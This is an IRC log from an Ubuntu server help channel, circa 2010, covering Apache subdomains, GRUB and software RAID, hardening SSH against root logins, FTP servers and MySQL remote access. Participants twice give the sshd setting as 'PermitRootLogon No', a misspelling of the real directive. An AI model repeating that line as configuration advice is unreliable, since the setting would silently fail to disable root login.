 * RoyK is impressed
<RoyK> with the drives in lucid for paravirtualizating under hyper-v, ubuntu runs very well
<ruben23> hi guys any idea about this----> http://pastebin.com/RqEN6aRu
<ruben23> now i get this error after several of testing, please anyone--------> http://pastebin.com/Cs8SdTJ6
<Datz> has anyone read this? http://www.serverwatch.com/tutorials/article.php/3715071/Ubuntu-Server--Kernel-Configuration-Considerations.htm
<Datz> if so, is it pretty accurate?
<arrrghhh> can anyone help me out with a simple init script?  i have it added, i can see it... permissions look right, everything is good but when i try to run it, ubuntu says "No such file or directory" - but i'm autocompleting it with tab so i KNOW it's there....
<ScottK> arrrghhh: Always use the full path in an init script.
<arrrghhh> i was using the full path ScottK
<ScottK> OK.  That's the usual cause of such problems.
<ScottK> And the path has a leading "/"?
<arrrghhh> yep
<arrrghhh> i'm just trying to call it manually
<arrrghhh> let alone get it integrated with update-rc.d
<arrrghhh> hrm
<arrrghhh> when i try to run it with ./ I get a really odd error.
<ScottK> Those are my usual 2 mistakes.
<arrrghhh> hrm
<arrrghhh> i opened the file with notepad++ on my windows box
<arrrghhh> i wonder if that screwed it up
<lifeless> yes
<arrrghhh> i thought notepad++ would handle the file properly?
<lifeless> did you save from it ?
<arrrghhh> i know regular notepad will screw it up
<arrrghhh> lifeless, no but i copied from it
<lifeless> if it didn't write to it, it shouldn't affect it
<arrrghhh> hrm
<arrrghhh> yea i modified the file slightly with notepad++, then copied from it into nano in a ssh session...
<ruben23> hi how do i cehck the version of my ubuntu server..?
<arrrghhh> when i do 'sudo ./pms-linux status' i get the same "No such file or directory" error.
<arrrghhh> ruben23, well uname -r tells you kernel
<ghaleb> hello, I'm looking for a solution I can create Diskless windows systems booted from linux servers, I have a preinstalled softwares that I don't want to redeploy each time PCs crashed and want applications to run using local diskless machines hardware resources. is it possible ?
<arrrghhh> ghaleb, with LTSP yes, but this would boot Linux systems on the thin clients, not windows...
<ghaleb> arrrghhh: I know LTSP but it's not what I want, I want to boot Windows to hosts and applications to be running on hosts hardware
<arrrghhh> ruben23, there it is.  lsb_release -a
<arrrghhh> ruben23, check out this page - https://help.ubuntu.com/community/UsingTheTerminal
<arrrghhh> ghaleb, not sure that's possible... we used to use novell to drop windows images to clients, but that was just an image server like clonezilla... was NOT a thin-client solution.
<ghaleb> arrrghhh: yea I don't want a thin-client solution, I want to drop windows image, but not for installation, for desktop usage ,
<arrrghhh> ghaleb, not sure what you mean by that then... sounds like you do want a thin-client solution.  clonezilla will drop images...
<arrrghhh> lifeless, ScottK any other ideas?  I'm at a loss here.
<ghaleb> arrrghhh: I want users to connect their laptops and get his desktop booted from network, not from his drive
<ScottK> arrrghhh: Not really.  Sorry.
<arrrghhh> weird
<arrrghhh> ghaleb, so you do want them to work like thin-clients...
<ghaleb> arrrghhh: yeah 'like' but as I know thin-clients will perform application at application server and get back results, I don't want that, I want to use clients hardware resources
<ghaleb> arrrghhh: it's like LTSP in PXE
<arrrghhh> ghaleb, sorry if it's possible i have no clue how.
<ghaleb> arrrghhh: okay thank you very much, I saw it on youtube but don't know how do they pefrom
<arrrghhh> ghaleb, interesting.  i'd like to know how that's done, sounds like it'd be useful at work.
<qman__> Datz, 7.10 is horribly outdated, but the process used there would work with any version
<ghaleb> arrrghhh: very much, you can get rid of re-installation of windows pain :)
<arrrghhh> ghaleb, yea currently we use vmview... it's not bad but i think it's quite pricey.
<ghaleb> arrrghhh: ah I see. save money in FOS :)
<arrrghhh> yea, depending on the product money is no object to my company.  which has its perks.
<ghaleb> arrrghhh: I would be happy if I can boot linux for users it's totally possible , but I will get into applications support pain :
<arrrghhh> yea, probably.
<ruben23> hi si tehre any package for eaccelerator on ubuntu server lucid...?
<uvirtbot> New bug: #653828 in samba (main) "windows computers can't resolve samba share names in 10.04" [Undecided,New] https://launchpad.net/bugs/653828
<_Techie_> congratulations *buntu users, another PC shop has decided to offer boxes with *buntu pre installed
<_Techie_> http://www.modster-pc.co.nz/shop/
#ubuntu-server 2010-10-03
<pmatulis> _Techie_: where do you see that?
<_Techie_> pmatulis, see what?
<azexian> hey, getting a weird issue with a fresh server install, I've uploaded several large files from a client to the server, and upload speed was very quick, now downloading from server from same client I'm barely getting 500KB/s on a 100Mb/s connection, any ideas?
<electrofreak> sanity check... is it 100Mbps both ways?
<electrofreak> what kind of protocol? http? ssh? ftp?
<azexian> sorry only just saw messages, yes 100MB/s both ways, and tried through smb and ssh
 * RoyK blames Canada
<demonspork> I have an HP Proliant DL380 G3 server and I just install HP System Management Homepage v3.0.2.75, I managed to log into it but it has no data. I thought I had installed all of the necessary tools (all of the HP utilities from the .iso from HP) and they seem to work individually, but the management homepage I can't find hardly any documentation pertaining to it.
<demonspork> it is successfully pulling some of the snmp data I have set up, like it found the location from snmp but none of the other data sources are populating anything
<MonsterUnchained> Hey girls
<hggdh> er, what?
<Tashia> I have a question about the httpd. Is there a way to add a subdomain?
<Datz> Tashia: have apache2 installed?
<Tashia> Yes. Apache2 is what i meant. Sorry.
<Datz> Tashia: look in /etc/apache2/sites-available/
<Datz> edit default and add another virtualhost
<demonspork> can't you even use that to add a subdomain to your website with a wildcarded top level domain?
<Tashia> I am currious about this, Is there a way to have my server run its own DNS so I don't have to subscribe to some other site to have a domain name?
<demonspork> you have to purchase registration of a domain
<Datz> Tashia: also add "servername example.domain.com" to each virtualhost
<demonspork> there is no other way to get a domain name
<Tashia> Datz, Thanks. I'm trying it now.
<demonspork> can I just use a virtual host to add sub1.example.com and as long as example.com is wildcarded, the server will handle all requests to sub1.example.com with that vhost and example.com will be handled by its own vhost
<Datz> demonspork: yes afaik
<Datz> Tashia: have your own domain name, or suing somthing like dyndns?
<Datz> using*
<Datz> also, there is #httpd ;)
<demonspork> freedns.afraid.org is a good free nameserver solution
<demonspork> iz nice
<Datz> ah, ok.. I used to use dyndns, but haven't looked around much after that
<demonspork> yeah, I like some of dyndns's really short domains that I can get a subdomain for
<Datz> yea.. but limited in what you can pick, alike any similar service
<demonspork> although I really ought to get my own domain, it is easier to sell webhosting when you have a website
<Datz> yea, I'd assume so. :p
<Tashia> Datz, Do I add a new VirtualHost?
<Datz> Tashia: yes.. you could just copy the old one, and edit it
<demonspork> Tashia, make a file in /etc/apache2/sites-available/
<demonspork> name it after your website
<Tashia> I added the virtualhost but I can't seem to figure out how to make it a subdomain.
<_aegis> Hi all, I have a question about moving my ubuntu server to a new array...  I've already moved the filesystem to external drives.  When I move the filesystem back to the new array, I think grub will probably have problems.  Do you have any suggestions on how to address possibly grub issues in advance?
<Datz> add whever the address is under the "servername" variable
<_aegis> This is Ubuntu 10.4
<_aegis> server
<Tashia> Datz, I added the servername but it says it can not resolve host when I reboot the apache2 server
<_aegis> Hi all, I have a question about moving my ubuntu 10.4.1 x64 server to a new array...  I've already moved the filesystem to external drives.  When I move the filesystem back to the new array, I think grub will probably have problems.  Do you have any suggestions on how to address possibly grub issues in advance?
<Datz> Tashia: sorry, don't know what's wrong. try httpd
<Datz> #httpd
<Datz> _aegis: I don't know the answer, but have you looked here? https://help.ubuntu.com/community/Grub2
<_aegis> datz: thanks...  I have looked at that regarding grub2 in the past...  grub2 hurts my brain and I can't understand how it works.  So I'm basically asking what I am going to specifically have to do to make this server boot up.  Grub2 is so painful, I can already anticipate it being the problem that makes this fail.
<|rt|> _aegis: if you boot up on the install cd and choose rescue broken system one of the options it gives you is to reinstall grub
<_aegis> rt: oh okay...  that sounds awesome...  I'll plan on doing that.  Thanks!
<|rt|> I don't think it gives you that option though until you tell it to launch a shell on the broken system and then just type exit
<|rt|> and another menu will get displayed with that option
<|rt|> I just had to do that on a server I was installing with a raid controller that isn't supported by the kernel yet
<_aegis> cool...  I'm glad you added that!  I was about to take the server down (and I'm logged into IRC through it...)
<pennyless> Setting up dovecot-postfix with postfixadmin as a web interface on ubuntu server. Look for documentation that addresses all of the above.
<pennyless> Most of what I've found includes different MDAs such like courier rather than dovecot.
<demonspork> HP Server Management Homepage isn't finding any information: I installed all of the utilities from the disk I downloaded to support my Proliant server, including this HPsmh thing and I can log into its interface just fine.  I can't find any useful documentation for this either, so any help or even a link to further documentation would be tremendously helpful
<MTecknology> Any of you guys know much about EC2? I'm trying to find an idiots type guide to it
<dennis___> Hello
<dennis___> I have a quick question about how I would setup something in Ubuntu Server
<dennis___> Im going to be using it as a file server for a bunch of windows computers
<dennis___> I need the files to be kept on the server and not locally
<dennis___> but I also need to configure the windows computers to only look for files on the network drive and not locally
<dennis___> does anyone know how I would do this?
<dennis___> I only want all the client computers to beable to see files on the network pc and not on the local computer
<dennis___> Anyone around who can help me?
<ecelis> a winows channel would be better place to ask, you can share your files with ubuntu and samba+but how to restrict your windows users, ...well
<dennis___> Okay
<_Techie_> is there a server app that i can use to upload files to megaupload with an account?
<_Techie_> preferably with a web interface
<uvirtbot> New bug: #653950 in backuppc (main) "package backuppc 3.1.0-9ubuntu1 failed to install/upgrade: subprocess installed post-installation script returned error exit status 1" [Undecided,New] https://launchpad.net/bugs/653950
<knolls> is there a way for apache to send <variable>.mydomainname.com to another folder in www/?
<pennyless> knolls, are you wanting to send all traffic from "anything.mydomainname.com" to a separate folder or traffic from "specific.mydomainname.com"?
<knolls> specific pennyless
<knolls> and specific2.mydomainname.com specific3.mydomainname.com etc.
<pennyless> Ok knolls, then you'll want to create an apache config file for your specific subdomain and point to the directory you want as the root directory. Use the default file inside your 'sites-available' folder as a template.
<knolls> will i name the config file the subdomain name i want it to be?
<pennyless> I generally create a config file for each domain/subdomain I host. I name them after the domain. So, in this example your file would be named "specific.mydomainname.com.conf". That's my personal preference, but you can name it anything you like.
<pennyless> When you get that setup just run 'a2ensite' to allow apache to set the appropriate symlinks. When that's all done, restart apache.
<knolls> wonderful, thank you pennyless !
<pennyless> no problem. Glad I could help ;)
<demonspork> network usage graphing in splunk using the *nix app. HOW DOES IT WORK.  I can generate useful charts of just about everything it seems except for the netowrk stuff. I am currently using BandwidthD so I can graph all of this usage, but I would like to put all of this in the same interface
<demonspork> either that or get a CPU usage/memory monitoring solution that generates either images that I can put in a web page or generates the web page itself, similar to what BandwidthD is doing
<kinygos> good morning all...when i run parted -l, i have a number of Error: /dev/md_d6: unrecognised disk label...i'd like to use parted /dev/md_d6 rm to delete that partition (which no longer exists)...but i'm being warned that i should not use Parted unless i REALLY know what i'm doing...
<kinygos> i am trying to reset my second disk (where these partitions did exist)...
<kinygos> actually, apologies, i'm just going to do it...convinced myself while typing
<kinygos> and it didn't do anything...
<kinygos> does anyone know how i can get rid of these partition table errors?
<demonspork> so do you need anything left on that second disk?
<kinygos> nope...trying to reset it completely
<demonspork> have you tried fdisk to delete it
<kinygos> fdisk -l doesn't list the /dev/md_dx partitions
<kinygos> i still have the underlying /dev/sdbx partitions...
<demonspork> ok, then I am confused about what you are trying to do
<demonspork> what is the md_dx thing you are trying to delete?
<kinygos> i have a remote server that came with a second physical disk installed, but not mounted or partitioned...i've been trying to install raid on the server...
<demonspork> ah, trying to RAID it, now I understand more what is going on
<kinygos> i have no access to external media, so am trying to do it on a running system...
<kinygos> i think that my earlier attempts are affecting my future attempts...so i'm trying to totally remove any reference to raid on that disk
<knolls> once i set up the subdomains, do i just add the subdomain to my domain registrar and put in my ipaddress as the dns target?  i don't have my own nameserver just from editing apache config files do i?
<kinygos> i can reset the first disk with an automated re-image from the ISP, but they don't do anything to the second disk
<demonspork> knolls, no, you don't have it just from editing the config files, but if you wildcard the top level domain the apache server can tell when someone requests "sub1.example.com" versus "example.com" and handles them differently based upon the virtualhosts I imagine you have just spent some time configuring
<demonspork> at least that is my understanding
<demonspork> wildcard means that all requests to an unknown subdomain get sent to the top level domain's IP address
<knolls> yeah actually it turns out all you really need to do is edit /etc/apache2/httpd.conf it's a very simple setup, but i didnt realize i had to request a subdomain from my registrar
<knolls> i'll see what happens after this thing updates, thanks demon
<demonspork> easiest way is to leave httpd.conf alone
<demonspork> use /etc/apache2/sites-available/
<knolls> and just make a copy of default.conf in sites-available and change the name?
<demonspork> and change the properties like servername and stuff
<knolls> kk
<demonspork> and then use a2ensite newsitename
<knolls> what does a2ensite stand for
<demonspork> apache 2 enable site
<demonspork> all it does is creates a symlink from yoru site in sites-available/ to sites-enabled/
<demonspork> I have even gone so far as to make the sites-available config rw for the user running the site
<demonspork> but that can be dangerous if you do it to random people on the internet you is hositng for
<kinygos> mdadm --query /dev/md_d6 says that /dev/md_d6 is an md device which is not active, but mdadm --remove /dev/md_d6 has no effect...i've found a suggestion online to simply rm -rf /dev/md_d6
<kinygos> is that "safe" to do?
<kinygos> (i'm trying to remove all trace of the raid)
<qman__> gah, file server locked up again
<qman__> sysrq not working this time
<kucumber> on my server I've not got a "www" folder on my user, to allow files to be accessed via the IP do i need to copy them to root?
<kucumber> I would like to make a media file on my server either downloadable or I would like to test mplayer http://1.2.3.4 , there is no www folder in my user - i'm on ubuntu 10.04 lucid lynx server
<qman__> there would not normally be a www folder in your home directory
<qman__> you need to install a file sharing service of some kind in order to share files
<qman__> there is none by default
<kucumber> i'm using lxde
<kucumber> any recommendations as to what to use.
<qman__> well, if you want HTTP, apache is the recommended web server
<qman__> sudo tasksel install lamp-server
<qman__> if you want file sharing with windows clients, samba is the best choice
<kucumber> right, well locally I use linux mint
<kucumber> and on my server I use ubuntu 10.04 lucid lynx
<kucumber> i've been using linux about 3 months so a bit of a noob
<kucumber> but getting though it and loving what i've learned
<kucumber> so qman__ will installing lamp-server give that user a www directory?
<qman__> no
<kucumber> like my webhosting servers?
<qman__> it will install apache with a default site located at /var/www
<qman__> if you want a userdir configuration you'll have to set that up manually
<kucumber> for that specific user?
<qman__> no, in /var/www
<kucumber> ah i see
<qman__> you CAN set it up that way, but it requires significant configuration
<kucumber> right
<qman__> also, the most common way to do userdir web directories uses /home/$USER/public_html/
<kucumber> so if for example i put files into that dir from a user (not root) then the user has full access to those files (mod)
<kucumber> just like logging in via ftp on a webhosting package
<qman__>  /var/www is owned by www-data, regular users can't put files there by default
<kucumber> can I "sudo" files there
<qman__> yes, but then they're root-owned
<kucumber> right, in my case I believe ownership doesn't really matter as long as it's universally readable
<qman__> if it's only you putting files there for local network access, the default site should suffice
<kucumber> well it would be net wide access i'd imagine....
<kucumber> if it's on the ip
<kucumber> eg http://123.123.0.1/file.avi
<qman__> http is only a protocol
<qman__> you have to configure your router to serve pages to the internet
<kucumber> okay - lost me a little, however, the server is remote
<qman__> ah
<qman__> in that case, then yes
<kucumber> and a dedicated server from ovh.co.uk
<qman__> if you're the only one who needs write access, the default site should be fine
<kucumber> cool, so simply install the lamp server as suggested
<qman__> yes, and openssh-server if you haven't already
<qman__> as that's the best way to securely upload files
<kucumber> also what was the command tasksel?
<qman__> yes
<qman__> sudo tasksel install lamp-server
<kucumber> what do you mean open ssh server? I ssh to the server to use the terminal if that's what you mean
<qman__> yes
<kucumber> however - "tasksel" what's this command?
<qman__> tasksel allows you to install services, basically
<kucumber> okay
<qman__> it's used at the end of the install, where you choose the checkboxes
<qman__> but you can use it any time
<kucumber> i'll give it a go now
<qman__> it's the simplest way to install apache, php, and mysql
<kucumber> cool, does it matter that i'm logging in via a user rather than root
<qman__> you shouldn't ever be logging in as root directly
<qman__> that's what sudo is for
<qman__> sudo literally comes from the command name su, and the word do
<kucumber> yea cool, I don;t just for the nature of this installation I thought it *might* be required, but that's good it's not.
<qman__> as in switch-user, do this
<qman__> if your server is not configured as such already, you should ensure root cannot log in over SSH
<qman__> otherwise you're fairly vulnerable
<kucumber> ah
<kucumber> well I think I can
<kucumber> however, it's a remote server, so i kinda need to...
<qman__> no, you don't
<qman__> that's exactly what sudo is for
<qman__> as your user, log in and run 'sudo -i'
<qman__> when you run SSH on the internet, it's a given that you will be attacked by bots
<qman__> and it's also a given that these bots will attempt to brute force root's password
<qman__> by not allowing root to log in over SSH, you eliminate this possible intrusion
<qman__> as well as more targeted attacks on root's account
<qman__> you put another unknown factor into the mix, your user name
<qman__> instead of the given 'root'
<qman__> by default ubuntu doesn't have a root password at all
<qman__> but if you want one, you should still disable root logins over SSH
<knolls_> can i monitor users in real time using the cli on my server?
<kucumber> qman__
<kucumber> how do I go about disabling root logins over SSH? and why is it important i do so/
<qman__> you have two options
<qman__> disabling root logins altogether by unsetting root's password
<qman__> or setting "PermitRootLogon No" in /etc/ssh/sshd_config
<qman__> it's important because doing so reduces your attack surface
<qman__> if root can't log in, they can't break in as root directly
<qman__> they have to first compromise a user account, then attack root
<qman__> or attack vulnerable software--far more difficult to do and less likely to exist than a misconfiguration
<qman__> the most common attacks will not even attempt to break any accounts other than root
<kucumber> ah i see
<kucumber> but in what way could I login to make system edits in the future, say the system is compromised, what if the usr password is changed, i'm totally locked out of my server
<RoyK> EHLO
<RoyK> you should have an admin user with sudo access
<RoyK> also, login as root will be enabled on the console
<RoyK> the physical one or a serial or network console
 * RoyK still uses serial console for some linux boxes - it works (tm)
<kucumber> right
<kucumber> i just worry a little as it's totally remote access
<kucumber> no physical access to my server
<RoyK> kucumber: just create an admin user or two and allow them sudo access
<RoyK> if a root password is not set during install, the server can be rebooted into single user mode without a password
<RoyK> that is, a root password must be set after installation for a password to be required in single user mode
<kucumber> i see
<kucumber> so how do i disallow root ssh access?
<RoyK> [15:18]  <qman__> or setting "PermitRootLogon No" in /etc/ssh/sshd_config
<RoyK> and then, using something like fail2ban or denyhosts is a good addition to stop worms trying to ssh in on 'standard' users
<kinygos> i've just had my server re-imaged, logged in, launched grub, and from the grub prompt entered find /boot/grub/stage1...i get file not found.  am i doing something wrong?  ubuntu 9.04, grub 0.97
 * RoyK hands kinygos an usb cdrom and a 10.04 server cd
<kinygos> RoyK: i know :)
<kinygos> RoyK: i'm starting to think there's something dodgy with this ISP's "standard" installation
<kinygos> should grub have been able to find /boot/grub/stage1 on at least (hd0) which my server booted from?
<kinygos> df /boot tells me /dev/sda5, and in there i have a grub directory containing stage1 :(
<kucumber> is it ovh kinygos?
<kinygos> kucumber: i'm just googling ovh - never heard that term before..one sec
<kinygos> is ovh a hosting company???? (lol if my google speed reads fail)
<RoyK> kinygos: which hosting company are you using?
<kinygos> uk company called fasthosts
 * RoyK is just curious to know where he shouldn't buy services
<kinygos> they've been around a long time, with mixed reviews online
<kinygos> uname -a gives Linux server88-208-208-121.live-servers.net 2.6.28-19-generic #65-Ubuntu SMP Thu Sep 16 14:24:42 UTC 2010 x86_64 GNU/Linux
<RoyK> using 9.04 on their servers and not allowing mirrored disks on installs seems a bad start to me
<kinygos> it's not that they don't allow it, they just don't configure it on their ubuntu builds...if i'd gone with windows or centos, i would've had raid
<kinygos> i don't understand how grub is my bootloaded, but it couldn't find /boot/grub/stage1 or
<kinygos> sorry...or grub/stage1 or stage1
<kinygos> i'm such a donut...when i launch grub, it sets its root to /boot already...so what i needed to type was find /grub/stage1  apologies
 * RoyK starts throwing 10.04 server CDs in kinygos's direction
<kinygos> RoyK: how do you do those emotes with irssi??
<RoyK> emotes?
<RoyK> irssi?
 * RoyK uses xchat on os x
<kinygos> i'm running irssi...what you typed there came up as * RoyK users xchat on os x
<oCean> /me
 * RoyK nods
 * kinygos runs away hiding
 * oCean wiggles
<kinygos> oCean: thanks :)
<kinygos> RoyK: i think i've installed grub on my second hard disk...should i be doing anything to /etc/fstab before i attempt to reboot?
<fluvvell> My first 10.04 server install, going to replace an existing hardy and need a couple of raid0 partitions. Do I bother with LVM. I haven't done LVM since fedora days... any suggestions as to why I should ?
<fluvvell> Duh, I mean raid1
<qman__> LVM offers a little more flexibility should you decide to modify your configuration later
<qman__> entirely optional
<fluvvell> can I do the raid1 first, then LVM over that?
<fluvvell> Oh I just found a good article, https://help.ubuntu.com/10.04/serverguide/C/advanced-installation.html
<qman__> yes, that's how it's done
<qman__> md, then lvm, then filesystem
<qman__> or without it, md, then filesystem
<RoyK> kinygos: /etc/fstab should have the md devices
<fluvvell> qman__, thanks :-)  I was a bit confused when LVM came up early in the install process, but raid options weren't so obvious.
<RoyK> fluvvell: why not just md?
<RoyK> mirroring on md is very well tested
<fluvvell> md?
<fluvvell> RoyK, what do you mean "just md"?  and how much should I worry about grub2 on install? some people are complaining that it makes the system unbootable
<jMyles> I have it in my head right now that I"d like to pipe ALL incoming email to a python program.  Is this crazy?  It is relatively easy to do?  Do I even still need postfix at this point?
<qman__> my guess is that you might as well just implement the mail server into your python program
<qman__> the modules probably already exist for doing such
<qman__> unless you need some of the features of postfix
<RoyK> fluvvell: grub2 works well on my installations, with or without software raid1
<fluvvell> RoyK, yeah just reading this thread... http://ubuntuforums.org/showthread.php?t=1474950&page=2
<jMyles> qman__: No, I don't think I need any of the features of postfix, but I can't find a place to get started on implementing the mail server into my python program.  When someone sends something to someone@myserver, what is happening?  How does postfix know to kick up?
<RoyK> fluvvell: dunno - all I can say is that it works well on my setups
<RoyK> we have 5 boxes or so with software raid1 for the root fs
<fluvvell> RoyK, and you installed from scratch with a 10.04.1 cd ?  I have other boxes running software raid on root fs too, but I cant remember how I set them up, may have added raid later on. they're all pre hardy, now upgraded to hardy tho.
<RoyK> fluvvell: 10.4 from scratch, ye
<RoyK> fluvvell: 10.4 from scratch, yes
<RoyK> itÂ§s possible to add a mirror later, but reinstalling is far quicker in most cases
<ehcah> Hello. What is the worst possible scenario for uninstalling ebox and reinstalling webmin to manage my 10.4 Server install? I undertand that webmin is not supported. However, I can perform a lot of management from terminal. Webmin's web GUI is great for reviewing changes. Ebox on the other hand will overwrite any and all terminal based changes, which is useless to me.
<kinygos> RoyK: (or anyone who's been following my install-RAID drama) is there any chance you could spare a few more moments of your time?  i've installed grub on my second disk, updated the fstab, but on booting from that second disk, it reverts to the first drive...i'm looking for some pointers at things i should check to make sure grub can pick up the raid and boot from it
<RoyK> kinygos: pastebin fstab
<kinygos> RoyK: http://dpaste.com/252527/
<kinygos> i've updated the fstab on the mounted raid partition, not the one on the first disk
<kinygos> RoyK: my blkid output is http://dpaste.com/252528/
<kinygos> RoyK: i've just noticed something...when i boot from the second drive, i select the RAID entry i added to menu.lst, and the screen shows init: name_to_dev_t(/dev/disk/by-uuid/0f94....) where the uuid is that of my first disk's swap partition...maybe i've not configured menu.lst correctly?  menu.lst: http://dpaste.com/252532/
<kinygos> but there's no reference to the swap there....do i need to treat the swap partition especially?  the swap partition has the boot flag set on both sda1 and sdb1...should it be set somehow on md1?
<demonspork> iftop's first column of information used to tell me which of my IP addresses was being used for each of the connections being monitored. Now it just says "myserver.local".  How do I get it to stop doing that? I still want to see the reverse lookups for the other connection (second column) so the -n option isn't going to work.
<demonspork> it says myserver.local no matter what the actual IP is
<demonspork> can I set up my hosts file to distinguish between each of my external IP addresses when iftop does its lookups?
<demonspork> like name each of them internally
<erfiug> hello
<erfiug> I am looking for a service to allow users to open gnome sessions remotely
<erfiug> I tried VNC but it only allows a user per time
<erfiug> any idea?
<ecelis> use xdmcp
<ecelis> if security is a concern, use xdmcp over vpn or ssh tunnel at least
<erfiug> Yes, I am reading some info about this, I might try to use this tomorrow thanks :)
<uvirtbot> New bug: #654227 in clamav (main) "package clamav-milter 0.96.3 dfsg-2ubuntu0.10.04.1 failed to install/upgrade: subprocess installed post-installation script returned error exit status 1" [Undecided,New] https://launchpad.net/bugs/654227
<kinygos> RoyK: i think i've done it !!!! :)
<uvirtbot> New bug: #654249 in libnss-ldap (main) "libnss-ldap create troubles in gnome session when ldap server is unreacheable" [Undecided,New] https://launchpad.net/bugs/654249
<eriksson25> Anyone in that is good with proftpd?
<RoyK^> eriksson25: there are probably people around that can help you if you ask a real question
 * RoyK^ just uses vsftp when ftp is needed
<eriksson25> Oki, first some basic background info. Have been using proftpd for a long time. But the rpm relese is bad and filled with bugs. So compiled the new 1.3.3b and installed. Have it runing but cant get it to use tls. I have the same config file as in the old 1.3.2 and it wount work.
<eriksson25> It just lets ju in plain and simple, and gets  500 AUTH not understood  If I try to use auth tls
<eriksson25> And my other question is how I star/stop/restart it now. I used to have it as a init.d but now they use inetd and I havent got it to work on restarting/stoping.
<eriksson25> RoyK^ How hard is it to set up fsftp with tls, and difrent user root directorys. And hidden/locked folders.
<RoyK^> chrooting vsftpd?
<RoyK^> http://www.cyberciti.biz/tips/vsftp-chroot-users-limit-to-only-their-home-directory.html
<RoyK^> or just google.com
<eriksson25> Well, I was realy looking to solve my proftpd  since it has been working well for me and "almost" everything is set up.
<RoyK^> sorry - the rpm release is buggy?
<eriksson25> Yes, buggy as hell
<RoyK^> but then, ubuntu doesn't use rpm
<eriksson25> sorry, I ment the reposotory version.
<eriksson25> Have been googleing and trying for 6h straight now
<eriksson25> So a litle tired of it.
<RoyK^> something like 95% of open source ftp servers uses vsftpd
<RoyK^> I would guess there is a reason for that
<RoyK^> proftpd was the big thing in the ninetees
<eriksson25> Is there a problem runing two vsftpd besides eachother?
<RoyK^> you can't run two ftp servers on the same port
<eriksson25> no ofc not
<eriksson25> Thing is that I have a friend that runs vsftp on my server (for small stuf) And I dont want to interfear with his setup. But he runs it on a other port.
<kinygos> really dumb question, but is there any way to tell what is making a device or resource busy?  i'm trying to add a disk partition to a raid array (i've managed to do it for 4 other arrays)
<kinygos> does anyone know anything about the default options in the legacy grub menu.lst file?
<guntbert> kinygos: q1) fuser -m <file on that device>
<_ruben> kinygos: could you try to be even more vague regarding grub? :P
<_ruben> as for partitioning raid arrays, i tend to just use lvm for that
<kinygos> guntbert: thanks...i'll give that a go :)
<guntbert> kinygos: you're welcome :-) read man fuser for details
<kinygos> _ruben: there are lines in the menu.lst file that have a single # in front of them, but the instructions say to just edit them...i just wondered if the single # was not a comment
<guntbert> kinygos: are you certain, that you are still using grub1 ?
<_ruben> kinygos: they're comments indeed, but ubuntu's kernel upgrade scripts do use some of those comments, note that those comments are between special markers, like : ### BEGIN AUTOMAGIC KERNELS LIST
<kinygos> guntbert: i am indeed...grub-install -v gives 0.97 (this is an isp build of a server)
<kinygos> guntbert: i've been trying to install RAID on it all week before upgrading to 10.04 LTS
<ehcah> Can anyone explain what damage webmin might do to a 10.4 Server install? I know it is unsupported, but I'm not clear what harm it can bring.
<kinygos> _ruben: ah, that makes sense...thanks
<kinygos> i am so close to installing RAID on this server, and yet so far :( i can't add the partition mounted on / to my raid array :(
<kinygos> i thought i'd figured out my problem - i was pointing the kernel root at the physical disk partition, but when i set it to the raid partition, the server fails to boot, probably because the raid hasn't been mounted...is it possible to mount the raid before grub kicks in?
<lifeless> hardware or software raid ?
<kinygos> during boot, i get the error ALERT! /dev/disk/by-uuid/e68d4... does not exist. Dropping to a shell....
<kinygos> software
<kinygos> with md
<lifeless> having /boot on that is extremely tricky.
<lifeless> there are some guides around - I suggest googling. I don't know if it works with grub2.
<fluvvell> ecelis, I struggled with the whole xdmcp thing earlier this year for a remote user who only needed email and firefox. I settled for straight ssh with certificates. Two icons on the desk for the email and browser called the programs directly on the server. But what I found was that xdmcp is going through some major changes so things are not working right.
<fluvvell> ecelis, certainly not for lucid. Things were easier with 9.04, but there was no real security on the connection. Fine for a relatively closed local network.
<mgolisch> nx ftw
<eagles0513875> hey guys im having issues with mysql server 5.1 and it accepting remote connections from my laptop how can i fix that
<pmatulis> eagles0513875: make sure the server's authentication tables are set up appropriately.  also, that the server is listening on the appropriate interface & port you're trying to connect to
<eagles0513875> pmatulis: im using the default 3306 port
<pmatulis> eagles0513875: then investigate the other stuff
<eagles0513875> pmatulis: not sure what else is wrong
<pmatulis> eagles0513875: did you set up authentication for your connecting user (or host)?
<eagles0513875> pmatulis: i dont have a 2nd user setup yet
<eagles0513875> only root user
<pmatulis> eagles0513875: you're trying to connect with the root user?
<mgolisch> so you cant connect at all?
<eagles0513875> nope
<mgolisch> did you enable network?
<eagles0513875> this is the error i got FHost '192.168.2.101' is not allowed to connect to this MySQL serverConnection closed by foreign host.
<mgolisch> by default mysql only allows local connections via a unix socket
<eagles0513875> wait a min
<mgolisch> oh that looks like a message from your mysql server
<eagles0513875> ya
<eagles0513875> i tried telnetting into the port
<eagles0513875> humm
<eagles0513875> humm
<pmatulis> eagles0513875: is the server allowing root to connect from your host?
<eagles0513875> nope :(
<eagles0513875> im using mysql qorkbench to connect and its not
<eagles0513875> workbench*
<mgolisch> does it give the same message there?
<eagles0513875> yes
<mgolisch> odd never saw a message like that, looks like somekind of tcpwrapper host.allow/deny thing
<mgolisch> eagles0513875: maybe look at your mysql.user table
<mgolisch> it probably does not contain the hostname you connect from
<eagles0513875> mgolisch: should in this case use my internal ip since im on the same subnet as the server
<mgolisch> you probably only have an etry for user = root host=localhost
<pmatulis> eagles0513875: so you need to tell the server to allow the connection
<mgolisch> that wont allow connections from any host but localhost
<eagles0513875> exactly
<eagles0513875> wait a min
<eagles0513875> mgolisch:  and pmatulis i think there is also another serious issue Lost connection to MySQL server at 'reading initial communication packet', system error: 61
<eagles0513875> networkign issue
<eagles0513875> :(
<eagles0513875> what ip should i be using to try and access the server my internal ip or external
<mgolisch> how do you access it?
<mgolisch> also what does the bind-address line look like in your my.cnf?
<eagles0513875> mgolisch: atm im on the internal network
<eagles0513875> but when im not home ill access with the static ip i have
<eagles0513875> and the bind-address atm is local host
<mgolisch> it should have the ip you want it to listen on there or 0.0.0.0 to listen on all availiable ips/interfaces
<eagles0513875> not sure what to put it
<eagles0513875> ahhh ok
<mgolisch> this probably fixes your error
<eagles0513875> nope :(
<eagles0513875> restarting server maybe that does it
<eagles0513875> lol
<eagles0513875> my server sounds like an airplane at boot up
<eagles0513875> mgolisch: Host '192.168.2.101' is not allowed to connect to this MySQL server
<eagles0513875> im out for now mgolisch
<eagles0513875> ill try figure this out during lectures
<eagles0513875> can talk to the work bench devs
<eagles0513875> maybe get some help from them
<mgolisch> its because of the user table
<mgolisch> it doesnt contain that host
<eagles0513875> ok
<corpsegrindr> Hey, i was wondering if it is possible to limit user access to certian files on a network based on there ip address
